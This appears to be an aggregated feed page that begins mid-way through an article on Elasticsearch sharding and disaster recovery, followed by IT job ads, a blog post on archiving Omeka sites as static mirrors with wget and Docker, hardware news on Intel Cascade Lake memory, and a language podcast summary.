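console.log(a === b); // true: same routing value -> same shard

// 2) Date precision: truncating to the day means every query issued that
//    day shares one filter value, so filter caches hit far more often.
const toDay = (iso) => iso.slice(0, 10);
console.log(toDay('2018-07-09T13:02:23Z')); // '2018-07-09'
```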


Implementing System Monitoring

image


The technology center built a dedicated monitoring system for the business units. It periodically calls the Elastic Search CAT APIs on every server, stores the performance data in a separate Elastic Search cluster, and gives application owners a web page for monitoring the data.

image


Implementing Disaster Recovery

image

Elastic Search is distributed by nature. When creating the indexes, we sharded based on the projected data volume for the next few years, keeping each shard's size within a healthy range. To balance write speed against resilience, we set the number of replicas to 2, so data is spread across different servers; if one server in the cluster goes down, a replica on another server takes over directly.

To guard against a whole data center losing network or power and taking the cluster out of service, we deployed an identical Elastic Search cluster in a second data center in a different region. During routine replication, a copy of the data is also written to the disaster-recovery site, just in case.


Summary

image

The project evolved step by step, and we hit plenty of problems along the way. After going live, application server CPU and memory usage dropped sharply, while query speed stayed roughly on par with the pre-sharding days. We share the problems we met and how we approached them here for your reference.

References

  • Elastic Search official documentation;

  • https://en.wikipedia.org/wiki/Database_index

  • https://baike.baidu.com/item/%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B4%A2%E5%BC%95

  • https://logz.io/blog/solr-vs-elasticsearch/



TVS Apache RTR 200 4V Vs Bajaj Pulsar NS200 - Specification Comparison

Here we put the TVS Apache RTR 200 4V up against the Bajaj Pulsar NS200. The 200cc segment has only a handful of bikes, and these two are the most popular. The Apache offers many features for its segment, while the Pulsar offers a grunty engine with great fuel efficiency. Let's check out the comparison […]

The post TVS Apache RTR 200 4V Vs Bajaj Pulsar NS200- Specification Comparison appeared first on CarBlogIndia.


Software Engineer - OpenEdge Specialist - Luxembourg

Software Engineer - OpenEdge Specialist

An international company based in Luxembourg is looking for a Software Engineer, OpenEdge Specialist. The Software Engineer will take on responsibilities across a broad range of architecture, infrastructure and security engineering activities, especially covering IFS Web applications running on Progress OpenEdge Application Server.

Task/Responsibilities

- You will act as a database administrator for Progress OpenEdge databases. As such, you will be a key member of the working group in charge of designing, delivering, administrating and supporting those areas. Your assignments will include:
  - Designing, developing, delivering and documenting OpenEdge AppServer/WebSpeed and httpd Web server infrastructures. This especially covers the security and deployment/sizing configurations, as well as the deployment, operation and monitoring tooling
  - Participating in the creation and documentation of the architecture and security of IFS systems in general, including critical Internet customer-facing applications and systems using Public Cloud services; you will also be working on the applicable processes and standards
  - Acting as a database administrator for OpenEdge RDBMS, performing configuration, investigation and maintenance tasks
  - Monitoring and optimizing the usage of Progress software licenses
  - Assessing and driving the OpenEdge software upgrades
  - Interacting with Progress Support engineers, managing support cases and product roadmap
  - Participating in Middleware infrastructure activities that extend beyond the OpenEdge technology, especially in the area of enterprise Java
  - Analysing and remediating security vulnerabilities and security risks
  - Working with the other group members, reporting to the group lead
  - Participating in production implementation activities

Qualifications/required skills

  • University Degree (or equivalent) in computer science
  • Experience in configuring and deploying Progress OpenEdge 11 Classic AppServer/WebSpeed/WebSpeed Messenger. Knowledge of Pacific OpenEdge Application Server, Apache httpd and Apache ActiveMQ would be an asset.
  • Experience in configuring, deploying and maintaining Progress OpenEdge database
  • Experience in ABL programming language
  • Practical knowledge of TLS and public key cryptography, certificate and key deployment
  • Minimum experience in the Java language and a Java enterprise platform such as JavaEE or Spring
  • Understanding of the challenges posed by critical enterprise Web Middleware infrastructure, especially in the areas of information security, high-availability and performance
  • Ability to structure and document architecture and security concepts; very good English technical writing skills
  • Practical experience in the following technologies:
    o Linux and Windows OS; Shell Scripting
    o a Version Control System, preferably Git
    o an IDE (preferably Progress Developer Studio/Eclipse)
    o XML Schema
    o Apache Maven
    o Apache Ant
  • Additional assets: experience with public Cloud services and APIs (preferably Microsoft Azure); experience with Jenkins, Docker, Kubernetes and Ansible
  • Proficiency in written and spoken English; French and German language skills will be an asset

Company: SKILLFINDER INTERNATIONAL
Job type: Other

Senior Cloud engineer

Senior Cloud engineer

Task/Responsibilities

As part of our modernization strategy, you will take an active participation in the design of two new applications eventually deployed into the Microsoft Azure cloud; a reference data management system and a digitization platform primarily used for document data extraction and access through APIs. As such, you will be a key actor in charge of designing and integrating those applications with the current on premise IT landscape. Your assignments will include:
Designing and documenting the cloud architecture, ensuring non-functional requirements and alignment with IT security guidelines
Developing and executing practical use cases to validate the proposed design and technology, eg high availability, performance, crash recovery
Defining and documenting new standards relevant to the development and deployment of cloud applications
Assessing and optimizing the cost of using Microsoft Azure
Upskilling of the teams involved in the design, development, provisioning and operation of cloud applications
Qualifications/required skills

- Master's Degree (or equivalent) in a computer-based discipline
Good communication skills with the ability to justify and challenge architecture decisions
Hands-on experience in architecting Microsoft Azure native applications
Hands-on experience in Microsoft Azure infrastructure services (IaaS). Concrete experience in migrating on premise applications to Microsoft Azure is an asset
Experience with Serverless, Microservices and REST architecture styles
Experience in application security design, incl. identity and access management together with encryption and key management
Experience in regulatory requirements and concerns is an asset, eg risk assessment, exit strategy, data protection
Practical experience in the following technology:
o Linux OS, preferably RedHat Linux
o Java/J2EE, preferably RedHat EAP. Knowledge in Go, Spring Boot, Angular and/or React is an asset
o Messaging Middleware, preferably RedHat A-MQ
o RDBMS, preferably Oracle and MySQL
o Identity Management, preferably OpenAM
o Jenkins, Docker and Ansible
o Version Control System, preferably Git
o Repository manager, preferably Artifactory
o Apache Maven or Apache Ant
- Proficiency in written and spoken English; French and German language skills is an asset

    Company: SKILLFINDER INTERNATIONAL
    Job type: Other

Ed Summers: Omeka Staticify (👜🕸)

If you have some old Omeka sites that are still valuable resources, but are no longer being actively maintained, you might want to consider converting them to a static site along with the PHP code and database. This means that the site can stay online in much the form that it’s in now, at the same URLs, and you still have the code and database to bring it back if you want to. From a maintenance perspective this is a big win since you no longer have the problem of keeping the PHP, Omeka and MySQL code up to date and backed up. The big trade off is that the site becomes truly static. Making any changes across the static assets would be quite tedious. So only consider this if you really anticipate that the project is no longer being actively curated.

I have done this a few times with many Wordpress sites, but Omeka is a little bit different in a few ways so I thought it was worth a quick blog post to jot down some steps.

Disable Search

This is kind of important for usability. Since there will no longer be any server side PHP code and database for it to query, there’s unfortunately no way to have a search form on your Omeka site. This may be a deal break for you, depending on how you are using the search. The good news however is that people can still find your site via Google, DuckDuckGo, or some other search engine.

To disable search, take a look in your Omeka theme, often in common/header.php, and simply comment out the code that generates the search form.

It might be nice to be able to generate a static Lunr.js index for your database and drop it into your Omeka site before creating the static version. This an approach that the minimal computing project Wax has taken, and should work well for average size collections. Or perhaps you could configure a Google Custom Search Engine, and similarly drop that into your Omeka before conversion. But it may be easiest to simply accept that some functionality will be lost as part of the archiving process.

Localize External Resources

It’s fairly common to use JavaScript and CSS files from various CDNs. To find them iew the source of one of your Omeka pages and scan for http to review the types of JavaScript and CSS files that might be needed for the pages to work properly. If you find any try downloading them into your theme and then updating your theme to reference them there.

Use Slash URLs

This one is kind of esoteric, but could be important. Most Omeka installs don’t use trailing slashes on URLs, for example:

https://archive.blackgothamarchive.org/items
https://archive.blackgothamarchive.org/items/show/121

The problem with this is that when you use a tool like wget to mirror a website it will download those pages using a .html extension:

archive.blackgothamarchive.org/items/show/121.html
archive.blackgothamarchive.org/items.html

This works just fine when you mount it on the web, but if anyone has linked to https://archive.blackgothamarchive.org/items/show/121 they will get a 404 Not Found.

One way around this is to convert your application URLs to end in a slash prior to creating your mirror. You can do this by modifying the url function, which can be found in libraries/globals.php, or in application/helpers/Url.php in older versions of Omeka. This issue ticket has some more details.
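The change itself is tiny. As an illustrative sketch (the surrounding helper body varies between Omeka versions, so treat this as the shape of the edit rather than a drop-in patch):

```php
// At the end of Omeka's url() helper, just before the URL is returned,
// append a trailing slash to page URLs while leaving file URLs
// (e.g. .css, .js, .jpg) alone:
if (substr($url, -1) != '/' && !preg_match('/\.[a-z0-9]+$/i', $url)) {
    $url .= '/';  // e.g. /items/show/121 becomes /items/show/121/
}
return $url;
```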

Then your URLs will look like this:

https://archive.blackgothamarchive.org/items/
https://archive.blackgothamarchive.org/items/show/121/

and will be saved by wget as:

archive.blackgothamarchive.org/items/index.html
archive.blackgothamarchive.org/items/show/121/index.html

Then when someone comes asking for an old link like:

https://archive.blackgothamarchive.org/items/show/121

Apache will happily redirect them to:

https://archive.blackgothamarchive.org/items/show/121/

and serve up the index.html that's there. Whew. Yeah, all that for a forward slash. But if links are important to you it might be worth the code spelunking to get it working.
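That redirect is stock behavior from Apache's mod_dir module, so nothing beyond the defaults is needed; the relevant directives amount to:

```apache
# mod_dir redirects a request for an existing directory that lacks a
# trailing slash (301 to .../) and then serves the DirectoryIndex file.
DirectorySlash On
DirectoryIndex index.html
```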

Do the Crawl

I’ve used wget for this in the past. It's a venerable tool that has been battle-hardened over the years. It won't execute JavaScript in your pages, but most Omeka applications don't rely too heavily on that; it could be a problem if you use this approach to archive other types of sites.

The one problem with wget is that it has many, many options, many of which interact in weird ways. Here's an example wget command I use:

wget \
  --output-file $log \
  --warc-file $name \
  --mirror \
  --page-requisites \
  --html-extension \
  --convert-links \
  --wait 1 \
  --execute robots=off \
  --no-parent $url 2>/dev/null

This is painful, so I've developed a little helper utility I call bagweb so that I don't need to remember the options and what they do every time I want to mirror a website. The --warc-file option will also create a WARC file as wget goes, which can be useful, as we'll see in a second. You run bagweb giving it a URL and a name to use for a new directory that will contain a BagIt package:

% bagweb https://archive.blackgothamarchive.org bga

This will run for a while writing a log to bga.log. Once it’s done you’ll see a directory structure like this:

% tree bga
bga
├── bag-info.txt
├── bagit.txt
├── data
│   ├── bga.warc.gz
│   └── archive.blackgothamarchive.org.tar.gz
├── manifest-md5.txt
└── tagmanifest-md5.txt

You can zip up that directory or copy it to an archive. But before we do that, let's test it.

Test!

You can unpack your mirrored website and make sure it works properly by using Docker to easily start up an Apache instance:

tar xvfz bga/data/archive.blackgothamarchive.org.tar.gz
cd archive.blackgothamarchive.org
docker run -v `pwd`:/usr/local/apache2/htdocs -p 8080:80 httpd

And then turn off your Internet connection (wi-fi, ethernet, whatevs) and visit this URL in your browser:

http://localhost:8080/

You should see your Omeka site! For extra points you can download Webrecorder Player and open the generated WARC file and interact with it that way.

Install

Now that you have your static version of the website you need to move it up to your production web server. That should be as simple as copying the tarball up and unpacking it in the directory pointed to by your Apache DocumentRoot configuration.
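As a minimal sketch, the virtual host for the static site needs little more than a DocumentRoot (the ServerName and path here are placeholders):

```apache
<VirtualHost *:80>
  ServerName archive.blackgothamarchive.org
  DocumentRoot /var/www/archive.blackgothamarchive.org
</VirtualHost>
```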

You may also want to create a tarball of the Omeka server-side code and a MySQL dump of the Omeka database to save in your bag. It's probably worth noting some details about external dependencies in bag-info.txt, such as the versions of Apache, PHP and MySQL and the operating system type/version, for anyone courageous enough to try to get the code running again in the future.
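Something along these lines, where the paths, database name, and credentials are all placeholders:

```shell
# Snapshot the server-side pieces so they can be stored in the bag:
# a tarball of the Omeka code and a SQL dump of its database.
tar cvfz omeka-code.tar.gz /var/www/omeka
mysqldump --single-transaction -u omeka -p omeka_db > omeka-db.sql
```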

So, hardly a walk in the park. But if the Omeka environment is at risk for whatever reason this is a pretty satisfying process that ensures that the data is preserved, and still available on the web for people to use.


          Revue de Presse Xebia

The weekly press review of Big Data, DevOps and Web technologies, Java architectures and mobility in agile environments, brought to you by Xebia. Craftsmanship: Architecture audits: what to expect. Front: Best of 2016; Lighthouse: Progressive Web Apps Done Right. Data: Release of Apache Spark 2.1. Craftsmanship: How to determine...

The article Revue de Presse Xebia appeared first on Blog Xebia - Expertise Technologique & Méthodes Agiles.


          Comment on Disable Cookies using .htaccess file by Sohail Rahman Khan
Hi, I have a development domain and I have added this to its .htaccess file. Now I am linking the CSS file from that domain, but YSlow still shows that the CSS file being pulled is not cookie-free. I have an Apache 2.2 server and the MODX CMS.
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Software Development Manager – Big Data, AWS Elastic MapReduce (EMR) - Amazon.com - Seattle, WA
Amazon EMR is a web service which enables customers to run massive clusters with distributed big data frameworks like Apache Hadoop, Hive, Tez, Flink, Spark,...
From Amazon.com - Mon, 02 Jul 2018 08:17:21 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 20 Jun 2018 01:20:13 GMT - View all Seattle, WA jobs
          Software Development Engineer - Amazon Web Services - Amazon.com - Seattle, WA
Experience with Big Data technology like Apache Hadoop, NoSQL, Presto, etc. Amazon Web Services is seeking an outstanding Software Development Engineer to join...
From Amazon.com - Mon, 18 Jun 2018 19:27:06 GMT - View all Seattle, WA jobs
          Quick loading of web pages (index.html), in Help and technical support: Programming, software development, hardware, web
Topic: Quick loading of web pages (index.html) Message: Hello, I have a problem with web pages that contain more than 6 videos in mp4 format, each about 2 hours long: when such a page is accessed it just keeps loading and loading. If possible, I would like to know how to show only a simple still image from each video recording on the page instead of the whole recording, and have the video start through a link when the image is clicked. I am using apache2. If I put one, two or three videos the page loads quickly, but with 24 it never finishes, and even with 6 it takes a very long time. indexKrefeld2018-a.html

Krefeld 2018 - fr.Ewald Frank   Krefeld 2018 fr.Frank

video - audio - written

1 Jul 2018

1 Jul 2018 Kref
Thank you.

          Intel’s High-End Cascade Lake CPUs to Support 3.84 TB of Memory Per Socket

While Intel has yet to detail its upcoming Cascade Lake processors for servers, some of the key characteristics are beginning to emerge. According to a new report from ServeTheHome, some of the new chips will support up to 3.84 TB of memory per socket, more than double the 1.5 TB of DDR4 supported by contemporary Skylake-based Xeon Platinum M-series CPUs, by combining 512 GB Optane DIMMs and 128 GB DDR4 DIMMs. For a dual-socket system, this rises to up to 7.68 TB per node.

Last year Intel published a picture of a Cascade Lake-based server outfitted with six DDR4 DIMMs and six Optane Persistent Memory DIMMs per socket. Intel's code-named Apache Pass modules have a 512 GB capacity, whereas commercial standard DDR4 LRDIMMs currently top out at 128 GB. If these modules are installed into a server in a 6 x Optane and 6 x DDR4 configuration, they will provide 3072 GB of 3D XPoint memory and 768 GB of DDR4 RAM, for a total of 3.84 TB of memory.

For write endurance reasons, six DDR4 DIMMs and six Optane DIMMs per socket will likely be a popular configuration for servers that run databases which benefit from high capacity of memory.

These metrics are confirmed by a document released by QCT and their QCT QuantaMesh systems, with the key picture here below:

The top left is a single server in a 1U configuration, showing five PCIe expansion slots and up to 7.68 TB of memory capacity when Cascade Lake CPUs are installed. The bottom right is the T42D-2U, giving four nodes in a 2U configuration, totalling 30 TB of memory capacity in 2U of rack space. Given that the price of a single 128 GB DDR4 LRDIMM is circa $3500, with pricing for Optane still unknown, along with reports that pricing for Cascade Lake might be adjusted, these systems are likely to cost a pretty penny.

It is worth noting, given Intel's historic policy on product segmentation, that not all Cascade Lake SKUs will support the maximum 3.84 TB of memory, leaving it only to premium models. Or Intel may go even further, potentially, and say that not all SKUs will support Optane DIMMs - that might also be a premium feature. Intel did not confirm at the launch of Optane if all of the Cascade Lake Xeons would support it (the official response was 'we haven't released that information yet').

Related Reading

Source: ServeTheHome


          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          maven build fails with "Failed to execute goal org.apache.tomcat.maven:"
After integrating Maven into MyEclipse, maven build keeps failing with this problem and I can't find the cause. Reinstalling Maven gives the same problem, and none of the fixes I found online helped. Did something go wrong with my installation? Other plugins also keep running into problems. [INFO] Scanning for projects... [INFO]  [INFO] --------------------------< com.lzh:TestSSM1 >-------------------------- [INFO] Building Test...
          Open Source terms you should know
From Top Open Source Terms You Need To Know · Apache Foundation: a non-profit organization founded in 1999 that oversees the development and hosting of hundreds of open source projects, including Kafka, Hadoop, the Apache Web Server, ... · Branch: a duplicate of a piece of code kept under the control of […]
          The Last Straw - 11 December 2017

Books for word lovers, plus the stories behind some familiar terms. Want a gift for your favorite bibliophile? Martha and Grant have recommendations, from a collection of curious words to some fun with Farsi. Plus, some people yell "Geronimo!" when they jump out of an airplane, but why that particular word? Also, we call something that heats air a heater, so why do we call something that cools the air an air conditioner? The answer lies in the history of manufacturing. Also, quaaltagh, snuba, the last straw vs. the last draw, and I have to go see a man about a horse.

FULL DETAILS

There's a word for the first person to walk through your door on New Year's Day. The word is quaaltagh, and it's used on the Isle of Man. This Manx term is one of many linguistic delights in a book Martha recommends for word lovers: The Cabinet of Linguistic Curiosities: A Yearbook of Forgotten Words, by Paul Anthony Jones.

Why do we use the term air-conditioner to refer to a mechanism for cooling air, when we use the word heater to describe a mechanism for heating air? The term air conditioning was borrowed from the textile industry, where it referred to filtering and dehumidifying. The first use of this term is in a 1909 paper by Stuart Cramer called Recent Developments in Air Conditioning.

Snuba is a portmanteau--a combination of snorkel and scuba--and refers to snorkeling several feet underwater while breathing through a long hose that's attached to an air supply float on a raft.

What do you call that last small irritation, burden, or annoyance that finally makes a situation untenable? Is it the last straw or the last draw? Hint: it has nothing to do with a shootout at the O.K. Corral.

We've talked before about kids' funny misunderstandings of words. Martha shares another story from a Dallas, Texas, listener.

Quiz Guy John Chaneski has an inside-out puzzle that's clued by a short sequence of letters inside a longer one. For example, what holiday contains the letters KSGI?

A man in Surprise, Arizona, wonders why people jumping into a pool sometimes yell Geronimo! The history of this exclamation goes back to an eponymous 1939 movie about the famed Apache warrior Geronimo. The film was quickly popular on U.S. military bases, where the warrior's name became a rallying cry. A widely circulated story goes that in 1940, a U.S. Army private named Aubrey Eberhardt responded to teasing about his first parachute jump by yelling Geronimo! as he leapt into the wild blue yonder.

The acronym NIMBY stands for Not In My Back Yard. A more emphatic version used among urban planners is BANANA, which stands for Build Absolutely Nothing Anywhere Near Anything.

Someone who's really hungry might say I'm falling to staves, meaning they're famished. It's a reference to the way a barrel falls apart if the metal hoops that hold them together are removed.

A listener in Plaza, North Dakota, says he tried to signal some teenagers to lower their car window by moving his fist in a circle, but since they grew up with push-button window controls, they didn't understand the gesture. What's the best gesture now for communicating that you want someone to roll down their car window?

For the book lover on your gift list, Grant recommends the mix of magic in science in All the Birds in the Sky by Charlie Jane Anders. He also likes the work of Firoozeh Dumas: It Ain't So Awful Falafel, about an Iranian teenage girl living in California, as well as Dumas's books for adults, Funny in Farsi, and Laughing Without An Accent. Martha recommends Kory Stamper's love letter to lexicography, Word by Word: The Secret Life of Dictionaries, and Jessica Goodfellow's poetry collection about mountaineering, Whiteout.

A woman in Virginia Beach, Virginia, says her Appalachia-born grandmother would occasionally say that it was time to string the leather britches, or hang up the leather britches, or string up the leather britches. She was referring to preserving green beans. So why the leather and britches?

If you're living with a chronic illness or disability, you often have to ration your physical and mental energy. And if that illness isn't readily apparent to others, it can be hard to explain how debilitating that process can be. On her website But You Don't Look Sick, writer Christine Miserandino, who has lupus, illustrates that process with a handful of spoons, each representing a finite amount of physical and mental energy that must be spent in order to get through a typical day. Someone without a disability or illness starts each day with an unlimited number of spoons, while others must weigh which task is worth spending a spoon on, and then make more decisions as the supply is depleted. Inspired by that metaphor, a growing community of people facing such invisible challenges call themselves spoonies.

A listener in Elizabeth City, North Carolina, recalls that his grandfather used to announce he was headed to the restroom by saying I have to go see a man about a horse. An earlier version of the phrase is I have to go see a man about a dog. These phrases are among many euphemisms for leaving to take care of bathroom business, such as going to see Miss White or going to go pluck a rose.

A Burlington, Vermont, listener wants to settle a dispute: Can laughter be described as gregarious?

This episode is hosted by Martha Barnette and Grant Barrett, and produced by Stefanie Levine.

--

A Way with Words is funded by its listeners: http://waywordradio.org/donate

Get your language question answered on the air! Call or write with your questions at any time:

Email: words@waywordradio.org

Phone:
United States and Canada toll-free (877) WAY-WORD/(877) 929-9673
London +44 20 7193 2113
Mexico City +52 55 8421 9771

Donate: http://waywordradio.org/donate
Site: http://waywordradio.org/
Podcast: http://waywordradio.org/podcast/
Forums: http://waywordradio.org/discussion/
Newsletter: http://waywordradio.org/newsletter/
Twitter: http://twitter.com/wayword/
Skype: skype://waywordradio

Copyright 2017, Wayword LLC.


          SL Announces Monitoring as a Service for Apache Kafka
...defined alerts and pre-built monitoring displays, users can quickly deploy a powerful monitoring solution without the time, skill and expense necessary to build or configure their own monitoring applications. The new RTView Cloud designer provides additional capability for users to ...


          Middleware Engineer-II (Middleware Senior) - Mainstreet Technologies, Inc - McLean, VA
Middleware Engineer-II (Middleware Senior) Job Requirements: Required Skills: 3 – 5 years of Apache administration experience 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Thu, 17 May 2018 04:46:56 GMT - View all McLean, VA jobs
          Middleware Engineers - Mainstreet Technologies, Inc - McLean, VA
Middleware Engineer Professional Required Technical Skills Bachelor’s Degree · 3 – 5 years of Apache administration experience · 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Mon, 14 May 2018 10:39:11 GMT - View all McLean, VA jobs
          Infrastructure & App Monitoring Analyst - Ascent Services Group - De Pere, WI
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Ascent Services Group - Sun, 03 Jun 2018 15:34:33 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Talent Software Services - De Pere, WI
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Talent Software Services - Sat, 02 Jun 2018 03:34:20 GMT - View all De Pere, WI jobs
          Infrastructure & Application Monitoring Analyst - Ameriprise Financial - De Pere, WI
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Ameriprise Financial - Fri, 23 Mar 2018 18:56:54 GMT - View all De Pere, WI jobs
          Intel's Next-Generation Xeon CPUs to Support 3.84TB of Memory Per Socket?
Details have emerged about the Cascade Lake SP-based Xeon Scalable processors that Intel is preparing to launch in early Q3 2018. The Skylake SP-based Xeon Scalable processors released in 2017 support six memory channels with 2 DIMMs per channel, for up to 12 memory slots and 768GB per CPU; Cascade Lake SP is their successor. Prior to this, Intel had already shown Cascade Lake SP with the code-named Apache Pass.. Read the article

          (USA-UT-Salt Lake City) Windows System Administrator III
Myriad Genetics is looking for a Windows Systems Administrator III who possesses a strong level of experience and technical skill, will contribute within a fantastic team, and can demonstrate excellent customer service and initiative to ensure the business needs are understood and met.
+ Perform design, implementation, and administration of hardware and software systems including, but not limited to:
  + Servers - Windows (2008, 2008 R2, 2012 R2, 2016)
  + Kofax Capture, Transformation Module, Total Agility
  + OpenText ApplicationXtender Content Management System
  + VMware - ESX Infrastructure, vSphere 6.5 or above, NSX, Horizon 7, Airwatch/Workspace One
  + Experience with Dell Server Hardware Platforms
  + Active Directory, DNS, DHCP, Exchange, MailGate, VPN, WSUS, Microsoft Endpoint Protection, IIS/Apache, Certificate Authority, SharePoint
  + Microsoft Systems Center & Configuration Manager and Endpoint Protection
  + Microsoft SQL Server 2008/2012 or above including always-on availability groups
  + Identity Management systems
  + Backup/recovery systems (NetBackup Enterprise)
  + Scanning and content management systems
+ Contribute to on-call rotation for 24x7 support of Windows server systems.
+ Participate in scheduled off-hours monthly maintenance activities
+ Resolve ticket requests from the business units and end users in a timely manner
+ Train users and cross-train IT staff as needed
+ Create documentation for systems and processes and automate applicable processes
+ Ensure system backups are executed regularly and efficiently
+ Ensure system security through use of tools and standard processes
+ Work with vendors and service providers as needed to resolve issues and ensure best practices are followed
Minimum Requirements to be considered for the position:
+ BS in Computer Science, Information Systems, a related degree, or equivalent experience
+ 3-6 years of progressively responsible work in Windows server systems, preferably in a medium to large enterprise.
+ PowerShell scripting experience
+ Excellent troubleshooting and customer service skills
A successful candidate will demonstrate:
+ Continuous improvement attitude and proactive mentality to anticipate and plan for future needs and opportunities
+ High standard of customer service, quality, and attention to detail
+ Ability to utilize a high degree of creativity, analytical thinking, and initiative to solve business problems
+ Ability to excel in high pressure multitasking situations
+ Ability to excel in a collaborative team environment as well as work independently while following documented processes and procedures
+ Desire to share knowledge amongst the team through cross-training and documentation of systems, processes, and procedures
+ Strong oral and written English language skills including experience creating written documentation for technical and non-technical audiences
+ Experience with successfully managing systems through all phases of the system lifecycle
+ Ability to quickly learn new skills and systems
PREFERRED TECHNICAL QUALIFICATIONS:
+ MSSQL, VMware ESX, Microsoft AD, and Exchange
The physical demands described here are representative of those that must be met by an employee to successfully perform the essential functions of this job. While performing the duties of this job, the employee is frequently required to sit; talk; or hear. The employee is occasionally required to stand; walk; use hands to finger, handle, or feel; reach with hands and arms; and stoop; kneel; or crouch. The employee must occasionally lift and/or move up to 50 pounds. Specific vision abilities required by this job include close vision, distance vision and depth perception.
Myriad Genetics Inc. is a leading personalized medicine company dedicated to being a trusted advisor transforming patient lives worldwide with pioneering molecular diagnostics. Myriad discovers and commercializes molecular diagnostic tests that: determine the risk of developing disease, accurately diagnose disease, assess the risk of disease progression, and guide treatment decisions across six major medical specialties where molecular diagnostics can significantly improve patient care and lower healthcare costs. Myriad is focused on three strategic imperatives: maintaining leadership in an expanding hereditary cancer market, diversifying its product portfolio through the introduction of new products and increasing the revenue contribution from international markets. For more information on how Myriad is making a difference, please visit the Company's website: www.myriad.com.
Myriad is an equal opportunity employer and as such, affirms in policy and practice to recruit, hire, train and promote, in all job classifications without regard to race, color, religion, gender, age, sexual orientation, gender identity, national origin, disability status or status as a protected veteran. Reasonable accommodation will be provided for qualified individuals with disabilities and disabled veterans in job application procedures. We believe that diversity lends a regional, national, and global advantage to the clients we serve. Our workforce consists of dynamic individuals, with a range of backgrounds, talents, and skills.
Requisition ID: 2018-7241 Location Details: SLC Name: Myriad Genetics, Inc. Street: 320 Wakara Way
          Comment on How to install Apache Cordova on Ubuntu 18.04, by Sito
Hi Joaquín, thanks for all your tutorials, they are very good. I have a problem with a different topic: I can't enable the numeric keypad in Ubuntu 18.04 LTS. How do I do that, please? Thank you very much.
          Data Science Solution Architect - CSRA - Chantilly, VA
Provide domain expertise in big data distributed processing frameworks, Hadoop MapReduce and Yarn, Apache Spark, Open-Source and Commercial distributions...
From CSRA - Thu, 28 Jun 2018 22:14:43 GMT - View all Chantilly, VA jobs
          Data Science Solutions Architect - CSRA - Arlington, VA
Provide domain expertise in big data distributed processing frameworks, Hadoop MapReduce and Yarn, Apache Spark, Open-Source and Commercial distributions...
From CSRA - Fri, 06 Jul 2018 10:19:49 GMT - View all Arlington, VA jobs
          XAMPP Portable
With "XAMPP Portable" you can set up a web server. The package contains various components such as Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, FileZilla FTP Server, Mercury Mail Transport System, and SQLite. Once everything is installed, a complete development and test environment with databases and programming languages is at your disposal. Handy: this portable version of "XAMPP" can be started on any PC or notebook without installation, for example directly from a USB stick.
          XAMPP (Mac)
With "XAMPP" you can set up a web server. The package contains various components such as Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, FileZilla FTP Server, Mercury Mail Transport System, and SQLite. Once everything is installed, a complete development and test environment with databases and programming languages is at your disposal.
          XAMPP
With "XAMPP" you can set up a web server. The package contains various components such as Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, FileZilla FTP Server, Mercury Mail Transport System, and SQLite. Once everything is installed, a complete development and test environment with databases and programming languages is at your disposal.
          Importing a Public Certificate and Private Key into a Java Keystore

This guide covers configuration of Apache Tomcat with SSL using a public certificate and private key when a .p12, .pfx, or.pem file are not available. Assuming these certificates are issued by a Certificate Authority, the aforementioned files may be able to be downloaded from the CA and more easily imported into the Java keystore. Unfortunately, […]

The post Importing a Public Certificate and Private Key into a Java Keystore appeared first on Shamrock Solutions LLC.


          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Junior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, IIS, etc. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 11:19:28 GMT - View all Madison, WI jobs
          Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, IIS, etc. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 10:56:19 GMT - View all Madison, WI jobs
          apache2-mod_nss-1.0.17-alt1      Cache   Translate Page   Web Page Cache   
apache2-mod_nss-1.0.17-alt1  build Stanislav Levin, 10 july 2018, 14:30

Group: System/Servers
Summary: Apache 2.0 module for implementing crypto using the Mozilla NSS crypto libraries
Changes:
- 1.0.14 -> 1.0.17
- Enable tests
- Remove dependency on net-tools (closes: #34784)
          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
